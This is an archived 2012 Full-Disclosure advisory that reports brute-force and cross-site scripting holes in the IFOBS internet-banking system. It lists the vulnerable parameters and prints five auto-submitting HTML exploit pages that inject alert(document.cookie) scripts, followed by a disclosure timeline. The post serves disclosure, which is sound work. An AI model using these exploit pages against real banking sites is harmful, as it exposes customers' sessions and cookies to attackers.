| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 19 Sep 2012 16:41:23 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: BF and XSS vulnerabilities in IFOBS Hello list! I want to warn you about Brute Force and Cross-Site Scripting vulnerabilities in system IFOBS. IFOBS - it's Internet-banking system, which is widespread and particularly it's used by large number of Ukrainian banks. These are the next 36 vulnerabilities in IFOBS: 2 BF and 34 XSS (in the first advisory there were 38 vulnerabilities). ------------------------- Affected products: ------------------------- Vulnerable are all versions of IFOBS. The developers have ignored and not fixed these vulnerabilities (all holes from three advisories). ---------- Details: ---------- Brute Force (WASC-11): In login form of certificates console (http://site/ifobsClient/certmasterlogin.jsp) there is no protection against picking up password (captcha). In forms of checking registration status and editing of registration profile there are no protection against picking up password (captcha). Both forms are at page http://site/ifobsClient/regclientmain.jsp (they also can be accessed by addresses http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForStatus and http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForEdit) and they use the same script. Cross-Site Scripting (WASC-08): POST request at page http://site/ifobsClient/regclientmain.jsp in parameters: furtherAction, secondName, firstName, thirdName, BirthDay, BirthMonth, BirthYear, address, livePlace, passportSerial, passportNumber, PassportDay, PassportMonth, PassportYear, passportIssueAgency, tempDocSerial, tempDocNumber, DocDay, DocMonth, DocYear, idCodeNumber, CodeRegDay, CodeRegMonth, CodeRegYear, idCodeRegPlace, phone, email, pmcountry, pmnumber, keyword, password, bankAddress, bankContacts, typeclient. Exploits for the first five vulnerabilities (in parameters furtherAction, secondName, firstName, thirdName, BirthDay): IFOBS XSS-6.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post"> <input type="hidden" name="login" value="111111"> <input type="hidden" name="id" value="1111"> <input type="hidden" name="myaction" value="login"> <input type="hidden" name="furtherAction" value='"><script>alert(document.cookie)</script>'> </form> </body> </html> IFOBS XSS-7.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post"> <input type="hidden" name="secondName" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="BirthDay" value="01"> <input type="hidden" name="BirthMonth" value="01"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="submitform"> <input type="hidden" name="typeclient" value="standart"> </form> </body> </html> IFOBS XSS-8.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post"> <input type="hidden" name="firstName" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="BirthDay" value="01"> <input type="hidden" name="BirthMonth" value="01"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="submitform"> <input type="hidden" name="typeclient" value="standart"> </form> </body> </html> IFOBS XSS-9.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post"> <input type="hidden" name="thirdName" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="BirthDay" value="01"> <input type="hidden" name="BirthMonth" value="01"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="submitform"> <input type="hidden" name="typeclient" value="standart"> </form> </body> </html> IFOBS XSS-10.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post"> <input type="hidden" name="BirthDay" value='</script><script>alert(document.cookie)</script>'> <input type="hidden" name="BirthMonth" value="01"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="submitform"> <input type="hidden" name="typeclient" value="standart"> </form> </body> </html> ------------ Timeline: ------------ 2012.05.04 - found vulnerabilities during pentest. After I've informed my client, he could inform the developers. 2012.05.29 - announced at my site. 2012.06.01 - informed the developers about vulnerabilities (the first advisory). 2012.06.01 - informed the developers about vulnerabilities (the second advisory). 2012.06.02 - informed the developers about vulnerabilities (the third advisory). 2012.09.18 - disclosed at my site (http://websecurity.com.ua/5859/). Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists